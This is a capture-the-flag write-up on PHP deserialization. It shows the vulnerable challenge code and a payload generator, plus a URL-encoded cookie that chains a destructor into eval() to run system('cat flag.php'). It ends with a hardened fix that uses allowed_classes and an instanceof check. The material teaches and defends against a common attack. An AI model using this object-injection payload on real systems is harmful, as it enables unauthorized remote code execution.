PHP Deserialization: eval()


ez_unserialize

Analysis

The challenge source first:

```php
<?php
error_reporting(0);
highlight_file(__FILE__);

class User{
    private $username='name';
    private $password='password';
    private $class = 'info';

    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        if($this->username===$u&&$this->password===$p){
            echo "successfully login";
        }
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class evil{
    private $code;
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}
```

First locate the deserialization sink: `$user = unserialize($_COOKIE['user']);`. The payload therefore goes into the `user` cookie, which can be set with a browser extension such as Cookie Editor.

The `evil` class contains `eval()`, which executes its string argument as PHP code, so that is the target. It is reachable because `User::__destruct()` calls `$this->class->getInfo()` without checking what type `$this->class` actually is: any object with a `getInfo()` method, including `evil`, will be invoked when the `User` object is destroyed.

The `User` constructor is what creates the inner object, so in the payload generator it is changed to `$this->class=new evil();`.

EXP

Payload generator (note that when this script exits, its own `User::__destruct()` runs, so the `eval()` also fires locally):

```php
<?php
error_reporting(0);
// highlight_file(__FILE__);

class User{
    private $username='name';
    private $password='password';
    private $class;

    public function __construct(){
        $this->class=new evil();
    }
    public function login($u,$p){
        if($this->username===$u&&$this->password===$p){
            echo "successfully login";
        }
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class evil{
    private $code="system('cat flag.php');";
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}

$a=new User();
echo(urlencode(serialize($a)));

?>
```

Output (set as the cookie), and the URL to request with it:

```
user=O%3A4%3A%22User%22%3A3%3A%7Bs%3A14%3A%22%00User%00username%22%3Bs%3A4%3A%22name%22%3Bs%3A14%3A%22%00User%00password%22%3Bs%3A8%3A%22password%22%3Bs%3A11%3A%22%00User%00class%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00code%22%3Bs%3A23%3A%22system%28%27cat+flag.php%27%29%3B%22%3B%7D%7D
/?username=name&password=password
```

Both GET parameters must be present to satisfy the `isset()` check; with them and the cookie set, `unserialize()` runs, the destructor fires, and the flag is printed.
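As an added defensive counterpart (this is not code from the writeup or the challenge), here are the same three classes with the two defects closed: the destructor only dispatches to the type the design expects, and `unserialize()` is given an `allowed_classes` allow-list. The `innerType()` helper and `loadUser()` function are additions for the demo; the payload string is the writeup's own cookie value, URL-decoded.

```php
<?php
// Added hardened counterpart to the challenge (not from the writeup):
// the same three classes, with the two defects closed.
class info {
    private $user = 'xxxxxx';
    public function getInfo() { return $this->user; }
}

class evil {
    private $code;
    public function getInfo() { eval($this->code); } // the gadget, now unreachable
}

class User {
    private $username = 'name';
    private $password = 'password';
    private $class;
    public function __construct() { $this->class = new info(); }
    // Helper added for the demo: reports what type the inner object really has.
    public function innerType(): string { return get_class($this->class); }
    public function __destruct() {
        // Fix 1: dispatch only to the type the design expects. An injected object
        // of any other class (or an incomplete-class stub) is simply ignored.
        if ($this->class instanceof info) {
            $this->class->getInfo();
        }
    }
}

// Fix 2: allow-list the classes unserialize() may instantiate. Any other class
// name in the payload becomes a __PHP_Incomplete_Class stub whose methods cannot run.
function loadUser(string $cookie): ?User {
    $obj = @unserialize($cookie, ['allowed_classes' => ['User', 'info']]);
    return $obj instanceof User ? $obj : null;
}

// The writeup's cookie value, URL-decoded; '~' stands in for the NUL bytes that
// mark private properties and is swapped for "\0" below.
$payload = str_replace('~', "\0",
    'O:4:"User":3:{s:14:"~User~username";s:4:"name";s:14:"~User~password";'
  . 's:8:"password";s:11:"~User~class";O:4:"evil":1:{s:10:"~evil~code";'
  . 's:23:"system(\'cat flag.php\');";}}');

$user = loadUser($payload);
echo $user->innerType(), PHP_EOL;   // __PHP_Incomplete_Class, not evil
// When $user goes out of scope, __destruct() sees a non-info object and does
// nothing: no eval(), no system().
```

With the allow-list alone, the stub object would already make the destructor throw an Error instead of running `eval()`; the `instanceof` check turns that crash into a silent no-op and also covers any allowed class that happens to define `getInfo()`.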
